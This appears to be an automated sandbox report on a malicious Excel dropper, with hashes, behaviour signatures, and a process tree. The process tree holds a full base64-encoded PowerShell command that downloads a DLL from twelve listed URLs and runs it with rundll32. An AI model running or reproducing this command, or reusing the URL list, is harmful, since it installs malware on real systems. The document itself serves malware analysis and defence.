Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 20:51

General

  • Target

    223cd65775cc7ae7c51f008c979fdd81bf9334ac1510be4120b5a72f2e60830d.xls

  • Size

    144KB

  • MD5

    c1fa1f292a680c4b364f181a890b9d9b

  • SHA1

    f2c784cfcca452022d9e39fa8310e5ba6b93054b

  • SHA256

    223cd65775cc7ae7c51f008c979fdd81bf9334ac1510be4120b5a72f2e60830d

  • SHA512

    1c4157daf0ad7d97af5bed5505320e9df6c5d2acc2a2f98f94814057501f47962db58df72b74ce49ff91ae0aafcfea9692d3fefa308bd2e4f1c0f8d9579f2b53

  • SSDEEP

    3072:n7cKoSsxzNDZLDZjlbR868O8K0c03D38TehYTdeHVhjqabWHLtyeGx6Z84TIKGxG:7cKoSsxzNDZLDZjlbR868O8K0c03D389

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://althyplane.com/wp-admin/ELWa8YcOqlJn/

exe.dropper

http://dreamdancefactory.clnetworktv.com/zegsgpzq/CT75/

exe.dropper

http://ajkersomaj.com/wp-admin/ThBwKpUbIffmrepRg/

exe.dropper

http://1asehrgut.com/dup-installer/3vESrkJAS97l/

exe.dropper

http://dreamcityloveaffair.com/60bv5/RG9Kb1qRlQ/

exe.dropper

http://dreamproductionsfl.com/tmw8t/Szjjcj5mU1ZA/

exe.dropper

http://dreamcityimprov.com/d5759pd/yzbV45v1nY/

exe.dropper

http://delmarpropertyservices.com/nw1t8jj/NUrSuFyX6P/

exe.dropper

http://batumi4u.com/nwj7iw/jgiK2uwhsu/

exe.dropper

http://blasieholmen-staging.tokig.site/b/SOcGvzIi31HDg/

exe.dropper

http://climate.thecedarcentre.org/cgi-bin/3eseeNZ/

exe.dropper

http://changeyourcommunitynow.com/s1hf7qm/TqcrwYcOiqV8fWA/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\223cd65775cc7ae7c51f008c979fdd81bf9334ac1510be4120b5a72f2e60830d.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2228
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\programdata\cbjwektde.bat" "
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AYQBsAHQAaAB5AHAAbABhAG4AZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ARQBMAFcAYQA4AFkAYwBPAHEAbABKAG4ALwAsAGgAdAB0AHAAOgAvAC8AZAByAGUAYQBtAGQAYQBuAGMAZQBmAGEAYwB0AG8AcgB5AC4AYwBsAG4AZQB0AHcAbwByAGsAdAB2AC4AYwBvAG0ALwB6AGUAZwBzAGcAcAB6AHEALwBDAFQANwA1AC8ALABoAHQAdABwADoALwAvAGEAagBrAGUAcgBzAG8AbQBhAGoALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFQAaABCAHcASwBwAFUAYgBJAGYAZgBtAHIAZQBwAFIAZwAvACwAaAB0AHQAcAA6AC8ALwAxAGEAcwBlAGgAcgBnAHUAdAAuAGMAbwBtAC8AZAB1AHAALQBpAG4AcwB0AGEAbABsAGUAcgAvADMAdgBFAFMAcgBrAEoAQQBTADkANwBsAC8ALABoAHQAdABwADoALwAvAGQAcgBlAGEAbQBjAGkAdAB5AGwAbwB2AGUAYQBmAGYAYQBpAHIALgBjAG8AbQAvADYAMABiAHYANQAvAFIARwA5AEsAYgAxAHEAUgBsAFEALwAsAGgAdAB0AHAAOgAvAC8AZAByAGUAYQBtAHAAcgBvAGQAdQBjAHQAaQBvAG4AcwBmAGwALgBjAG8AbQAvAHQAbQB3ADgAdAAvAFMAegBqAGoAYwBqADUAbQBVADEAWgBBAC8ALABoAHQAdABwADoALwAvAGQAcgBlAGEAbQBjAGkAdAB5AGkAbQBwAHIAbwB2AC4AYwBvAG0ALwBkADUANwA1ADkAcABkAC8AeQB6AGIAVgA0ADUAdgAxAG4AWQAvACwAaAB0AHQAcAA6AC8ALwBkAGUAbABtAGEAcgBwAHIAbwBwAGUAcgB0AHkAcwBlAHIAdgBpAGMAZQBzAC4AYwBvAG0ALwBuAHcAMQB0ADgAagBqAC8ATgBVAHIAUwB1AEYAeQBYADYAUAAvACwAaAB0AHQAcAA6AC8ALwBiAGEAdAB1AG0AaQA0AHUALgBjAG8AbQAvAG4AdwBqADcAaQB3AC8AagBnAGkASwAyAHUAdwBoAHMAdQAvACwAaAB0AHQAcAA6AC8ALwBiAGwAYQBzAGkAZQBoAG8AbABtAGUAbgAtAHMAdABhAGcAaQBuAGcALgB0AG8AawBpAGcALgBzAGkAdABlAC8AYgAvAFMATwBjAEcAdgB6AEkAaQAzADEASABEAGcALwAsAGgAdAB0AHAAOgAvAC8AYwBsAGkAbQBhAHQAZQAuAHQAaABlAGMAZQBkAGEAcgBjAGUAbgB0AHIAZQAuAG8AcgBnAC8AYwBnAGkALQBiAGkAbgAvADMAZQBzAGUAZQBOAFoALwAsAGgAdAB0AHAAOgAvAC8AYwBoAGEAbgBnAGUAeQBvAHUAcgBjAG8AbQBtAHUAbgBpAHQAeQBuAG8AdwAuAGMAbwBtAC8AcwAxAGgAZgA3AHEAbQAvAFQAcQBjAHIAdwBZAGMATwBpAHEAVgA4AGYAVwBBAC8AIgAuAFMAcABsAGkAdAAoACIALAAiACkAOwAgAGYAbwByAGUAYQBjAGgAKAAkAHMAdAAgAGkAbgAgACQAcgBvAHcAaQBmAGkAdQBkACkAewAkAHIAcgB5AGkAdQBkAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAZgBnAGgAaQB1AHMAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAPQAiAGMAOgBcAHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcACIAKwAkAHIAcgB5AGkAdQBkACsAIgAuAGQAbABsACIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABzAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAOwBpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwApAHsAaQBmACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAA1ADAAMAAwADAAKQB7ACQAZwBoAEQARABGAEoASABrADUAZgA9ACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHcAbwB3ADYANABcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwAkAHQAeQBpAGQAdQBpAHMAZABmAGYAPQAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKwAiACwAZgAiACsAJABmAGcAaABpAHUAcwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGcAaABEAEQARgBKAEgAawA1AGYAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJAB0AHkAaQBkAHUAaQBzAGQAZgBmADsAYgByAGUAYQBrADsAfQB9AH0A
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2912

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\programdata\cbjwektde.bat

    Filesize

    3KB

    MD5

    a90319111c2f42a9c83a3a2bc2613d74

    SHA1

    bf1171da149442a511a946ded726b94c1ad7cf85

    SHA256

    763706fce04801df0720ca67b0905876ddf4f3fc1aedbbd1d032e96b227a6e51

    SHA512

    1358cf85166ea3a135425e7aa274ab66dd21605f3635c5260fd35e5134ef9698ea5b38df21721aaa72040d6f2506f5b3e926a72698dec56191d8079e3511ffe7

  • memory/2228-37-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-36-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-35-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-34-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-33-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-32-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-31-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-30-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-29-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-27-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-28-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-26-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-23-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-20-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-18-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-17-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-15-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-14-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-25-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-24-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-12-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-21-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-11-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-19-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-16-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-13-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-10-0x0000000006600000-0x0000000006700000-memory.dmp

    Filesize

    1024KB

  • memory/2228-9-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-8-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-7-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-6-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-5-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-4-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-3-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB

  • memory/2228-1-0x000000007262D000-0x0000000072638000-memory.dmp

    Filesize

    44KB

  • memory/2228-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2228-49-0x000000007262D000-0x0000000072638000-memory.dmp

    Filesize

    44KB

  • memory/2228-50-0x0000000000340000-0x0000000000440000-memory.dmp

    Filesize

    1024KB